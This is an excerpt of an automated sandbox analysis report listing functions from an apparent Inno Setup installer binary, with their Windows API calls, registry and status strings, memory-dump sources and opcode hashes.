                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00478DB4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 86registryCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                                                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,00478E9A,?,?,00000001,00000000,00000000,00478EB5), ref: 00478E83
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00478E0E
                                                                                                                                                                                                                                                                                                                                                                  • %s\%s_is1, xrefs: 00478E2C
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CloseOpen
                                                                                                                                                                                                                                                                                                                                                                  • String ID: %s\%s_is1$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 47109696-1598650737
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: eeeee470d2837c7a85cae18e796e1409a5c3dc5caac6b7724d910eb604216afa
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 403b8390735a8e98fed73365c843d129082673b7d0193522817cb9849c55968d
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eeeee470d2837c7a85cae18e796e1409a5c3dc5caac6b7724d910eb604216afa
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 79218470B40208AFDB01DFAACC55A9EBBE8EB48304F90847EE904E7381DB785D018A59
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00453A10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,00453AFF,?,?,00000000,0049B628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00453A56
                                                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,00000000,?,00000000,00453AFF,?,?,00000000,0049B628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00453A5F
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                                                                                                                                                                                                  • String ID: .tmp
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1375471231-2986845003
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: b76eafa97667a84610daa19fe4d4c4c0a9a20cd0f16e5628455c409d9e3b40d9
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: fcbeb811eea92760dd82faa40bdacdd366465f8a5342b7af386d3ee3900427bd
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b76eafa97667a84610daa19fe4d4c4c0a9a20cd0f16e5628455c409d9e3b40d9
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5A213375A00208ABDB01EFA1C8429DEB7B9EB48305F50457BE801B7342DA789F058AA5
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00450154 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 78windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • SendMessageA.USER32(00000000,0000044B,00000000,?), ref: 004501E9
                                                                                                                                                                                                                                                                                                                                                                  • ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 0045021A
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ExecuteMessageSendShell
                                                                                                                                                                                                                                                                                                                                                                  • String ID: open
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 812272486-2758837156
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: adeb5e276340ad6fa3d53176e38ffb5e58c1499704c489fbf40d86a9362c05b3
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 6e2feb9b457cb976a84d54f3b3258ed3b08e14d6ba220cef3ebd8abcd6e201e4
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: adeb5e276340ad6fa3d53176e38ffb5e58c1499704c489fbf40d86a9362c05b3
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 62219474E40208AFDB00DFA5C886B9EB7F8EB44705F2081BAB514E7282D7789E05CB58
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0045527C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00455318
                                                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(0000003C,00000000,00455361,?,?,00000001,00000001), ref: 00455329
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0042D8D4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8E7
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: DirectoryErrorExecuteLastShellSystem
                                                                                                                                                                                                                                                                                                                                                                  • String ID: <
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 893404051-4251816714
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 94ae09d0a25fb1738ecc061ea662f04067247507c52871123d701916d6d8ec01
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: ea799879bbb6ab716a70283d096866571a468ac1fa4b8cc73728b10af3e72d10
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 94ae09d0a25fb1738ecc061ea662f04067247507c52871123d701916d6d8ec01
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 02215370A00609ABDB10DFA5D8926AE7BF8AF18355F50443AFC44E7281D7789949CB58
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00402584 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,)), ref: 004025C7
                                                                                                                                                                                                                                                                                                                                                                  • RtlLeaveCriticalSection.KERNEL32(0049B420,0040263D), ref: 00402630
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,0049B460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,0049B460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,0049B460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,0049B460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                                                                                                                                                                                                                                                                                                                  • String ID: )
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2227675388-1084416617
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 09cf32ac568926239da630a480ec85c7fe0e44c3c7351229851fbcf18ccaddb2
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 77bd95ba853a3ee3b707a504883d316aad751082ca23ba06a0d8aa2ba3da16af
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 09cf32ac568926239da630a480ec85c7fe0e44c3c7351229851fbcf18ccaddb2
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E11104317042046FEB15AB796F5962B6AD4D795758B24087FF404F33D2DABD8C02929C
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 004964FE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097), ref: 00496539
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Window
                                                                                                                                                                                                                                                                                                                                                                  • String ID: /INITPROCWND=$%x $@
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2353593579-4169826103
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 552611a81f91654fc44d41bb0f0c519a98a2c07263e337a61ce07e3eab6c417a
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 8ac61a852f64af84e8a4d996ffe215da0ea6a1f7c0dd4c2642a2787a2d41e8fe
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 552611a81f91654fc44d41bb0f0c519a98a2c07263e337a61ce07e3eab6c417a
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C711A531A043089FDB01DF64E855BAE7BE8EB48324F52847BE404E7281DB3CE905CA58
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00447424 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                                                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 004474D6
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: String$AllocByteCharFreeMultiWide
                                                                                                                                                                                                                                                                                                                                                                  • String ID: NIL Interface Exception$Unknown Method
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3952431833-1023667238
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 258d3c6477c64922ebec54d5f4264d59c03dbf12c3c57b46792931bb3fd1eaaf
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: aafd2560cbf8ba646f5ae6954b41d26adab4393ec7197c17a1bba45f9511721b
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 258d3c6477c64922ebec54d5f4264d59c03dbf12c3c57b46792931bb3fd1eaaf
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0811D6306042049FEB10DFA59D42A6EBBACEB49704F91403AF504E7681C7789D01CB69
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0042DD74 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56registryCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,Inno Setup: No Icons,00000000,00000000,00000000,00000000), ref: 0042DD88
                                                                                                                                                                                                                                                                                                                                                                  • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,Inno Setup: No Icons,00000000,00000000,00000000), ref: 0042DDC8
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Value$EnumQuery
                                                                                                                                                                                                                                                                                                                                                                  • String ID: Inno Setup: No Icons
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1576479698-2016326496
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: ea5c964618fde9ae46c450d3f3289ded25757de6736eb6ae105a8e1ccd73aa92
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 05ef73584c9e0c756a5fead926ccd29af3c260b6948a855c27afe474e1c18ecb
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ea5c964618fde9ae46c450d3f3289ded25757de6736eb6ae105a8e1ccd73aa92
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B2012B36F5A77179F73046256D02BBB56888B82B60F68453BF940EA2C0D6589C04C36E
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0042ED48 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 55libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0042D8D4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8E7
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0042E3A4: SetErrorMode.KERNEL32(00008000), ref: 0042E3AE
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0042E3A4: LoadLibraryA.KERNEL32(00000000,00000000,0042E3F8,?,00000000,0042E416,?,00008000), ref: 0042E3DD
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EDB8
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AddressDirectoryErrorLibraryLoadModeProcSystem
                                                                                                                                                                                                                                                                                                                                                                  • String ID: SHAutoComplete$shlwapi.dll
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2552568031-1506664499
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 0eb2a4247d883db4f8848e38a968296293dae4ab51b06f4b6af3ba35488accfa
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: a33720f3aac7210c00664dabe11b621525643aa7ae94b1405928deeb439ddd4e
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0eb2a4247d883db4f8848e38a968296293dae4ab51b06f4b6af3ba35488accfa
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1611A331B00318BBDB11EB62ED81B8E7BA8DB55704F90407BF400A6691DBB8AE05C65D
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00497234 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004555D0: GetCurrentProcess.KERNEL32(00000028), ref: 004555DF
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004555D0: OpenProcessToken.ADVAPI32(00000000,00000028), ref: 004555E5
                                                                                                                                                                                                                                                                                                                                                                  • SetForegroundWindow.USER32(?), ref: 00497266
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  • Not restarting Windows because Uninstall is being run from the debugger., xrefs: 00497291
                                                                                                                                                                                                                                                                                                                                                                  • Restarting Windows., xrefs: 00497243
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Process$CurrentForegroundOpenTokenWindow
                                                                                                                                                                                                                                                                                                                                                                  • String ID: Not restarting Windows because Uninstall is being run from the debugger.$Restarting Windows.
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3179053593-4147564754
